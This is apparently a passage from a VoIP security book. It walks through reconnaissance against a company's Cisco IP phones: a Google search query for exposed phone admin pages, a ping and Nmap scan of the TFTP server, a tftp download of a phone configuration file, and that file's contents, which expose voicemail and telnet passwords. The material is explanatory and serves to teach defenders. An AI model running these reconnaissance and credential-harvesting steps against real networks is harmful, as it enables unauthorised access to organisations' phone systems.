Many of VoIP's security issues are similar to those of Internet applications installed in your enterprise. This similarity is mostly due to the fact that VoIP devices inherit so many of the traditional security vulnerabilities of the supporting services and infrastructure around them. Another reason is that VoIP phones and servers tend to support a wide range of features including HTTP, telnet, SNMP, TFTP, and the list goes on.
Because VoIP components typically support a variety of administrative protocols, this simplifies an attacker's efforts to perform basic network reconnaissance. Believe it or not, simply using Google can lead to a treasure trove of information about your VoIP network.
When performing reconnaissance on a potential target, there are a variety of ways a attacker can leverage search engines simply using the advanced features of a service such as Google. First, an attacker scours your company's job listings to see if any juicy details can be unearthed; lo and behold, he comes up with a job listing for "Cisco VoIP Engineer."
Leveraging this bit of information, he then dusts off his Google hacking skills to determine if any of your Cisco VoIP phones are exposed to the Internet. Because Google will index anything with a web service, it turns out that many VoIP phones are inadvertently advertised on the Internet because of their built-in web servers. The attacker types the following into a Google search:
inurl:"NetworkConfiguration" cisco site: yourcompany .com
He comes up with three hits:
Results 13 of 3 for " NetworkConfiguration " cisco site: yourcompany .com (0.10 seconds).
The hacker has just found the administrative web interface to three of your Cisco IP phones that were mistakenly left exposed to the Internet. As it turns out, without even needing a password, simply clicking any of these hits gives the hacker a wealth of information:
DHCP Server 22.214.171.124 BOOTP Server No MAC Address 001120017EA3 Host Name gk002020036ea3 Domain Name IP Address 126.96.36.199 Default Router 188.8.131.52 Subnet Mask 255.255.255.0 TFTP Server 1 184.108.40.206 NTP Server 1 NTP Server 2 DNS Server 1 220.127.116.11 DNS Server 2 Alt NTP Server 1 0.0.0.0 Alt NTP Server 2 0.0.0.0
Most VoIP phones check and download their configuration files after each reboot from a central TFTP server. Now that the attacker knows an IP address of a TFTP server from his Google hacking of the Cisco phones, he can check to see if that server is also accessible from the Internet:
C:\>ping 18.104.22.168 Pinging tftpserver.yourcompany.com [22.214.171.124] with 32 bytes of data: Reply from 126.96.36.199: bytes=32 time=20ms TTL=54 Reply from 188.8.131.52: bytes=32 time=21ms TTL=54 Reply from 184.108.40.206: bytes=32 time=22ms TTL=55 Reply from 220.127.116.11: bytes=32 time=21ms TTL=54 Ping statistics for 18.104.22.168: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 20ms, Maximum = 22ms, Average = 21ms
Good news for the attacker, he can reach the TFTP server remotely without having to gain further access to your network. Next, to ensure the actual TFTP port is accessible, he fires up his copy of Nmap with a simple UDP scan:
Starting Nmap 4.01 (http://www.insecure.org/nmap/) at 2006-02-20 05:26 EST Interesting ports on tftpserver.yourcompany.com (22.214.171.124): (The 1473 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 67/udp open dhcpserver 69/udp open tftp 111/udp open rpcbind 123/udp open ntp 784/udp open unknown 5060/udp open sip 32768/udp open omad
Sure enough, UDP port 69 (TFTP) is wide open for the attacker to start running queries against. The attacker is looking specifically for configuration files that he knows the exact names of; otherwise , he won't be able to retrieve them.
Thanks to his previous Google hacking exercise, the attacker uses the MAC address of the Cisco phone to predict the configuration filename to download:
[root@attacker]# tftp 192.168.1.103 tftp> get SEP001120017EA3.cnf
Success! Now the attacker can read the configuration file for the SIP phone he just downloaded:
[root@attacker]# cat SEP001120017EA3.cnf # SIP Configuration Generic File (start) # Line 1 Settings line1_name: "502" ; Line 1 Extension\User ID line1_displayname: "502" ; Line 1 Display Name line1_authname: "502" ; Line 1 Registration Authentication line1_password: "1234" ; Line 1 Registration Password # Line 2 Settings line2_name: "" ; Line 2 Extension\User ID line2_displayname: "" ; Line 2 Display Name line2_authname: "UNPROVISIONED" ; Line 2 Registration Authentication line2_password: "UNPROVISIONED" ; Line 2 Registration Password # Line 3 Settings line3_name: "" ; Line 3 Extension\User ID line3_displayname: "" ; Line 3 Display Name line3_authname: "UNPROVISIONED" ; Line 3 Registration Authentication line3_password: "UNPROVISIONED" ; Line 3 Registration Password # Line 4 Settings line4_name: "" ; Line 4 Extension\User ID line4_displayname: "" ; Line 4 Display Name line4_authname: "UNPROVISIONED" ; Line 4 Registration Authentication line4_password: "UNPROVISIONED" ; Line 4 Registration Password # Line 5 Settings line5_name: "" ; Line 5 Extension\User ID line5_displayname: "" ; Line 5 Display Name line5_authname: "UNPROVISIONED" ; Line 5 Registration Authentication line5_password: "UNPROVISIONED" ; Line 5 Registration Password # Line 6 Settings line6_name: "" ; Line 6 Extension\User ID line6_displayname: "" ; Line 6 Display Name line6_authname: "UNPROVISIONED" ; Line 6 Registration Authentication line6_password: "UNPROVISIONED" ; Line 6 Registration Password # NAT/Firewall Traversal nat_address: "" voip_control_port: "5060" start_media_port: "16384" end_media_port: "32766" # Phone Label (Text desired to be displayed in upper right corner) phone_label: "cisco 7960" ; Has no effect on SIP messaging # Time Zone phone will reside in time_zone: EST # Phone prompt/password for telnet/console session phone_prompt: "Cisco7960" ; Telnet/Console Prompt phone_password: "abc" ; Telnet/Console Password # SIP Configuration Generic File (stop)
As you can see, the attacker now has access to the particular phone user's extension (502), her voicemail password (1234), and finally the administrative telnet password to her phone (abc). Using these details, there is no limit to the mischief that the attacker can perform.
As you will learn in the following chapters, there is a wealth of information that can be gleaned remotely using standard security reconnaissance techniques. To an attacker, footprinting, scanning, and enumeration are all valuable endeavors that will typically yield the information necessary to perform more advanced attacks.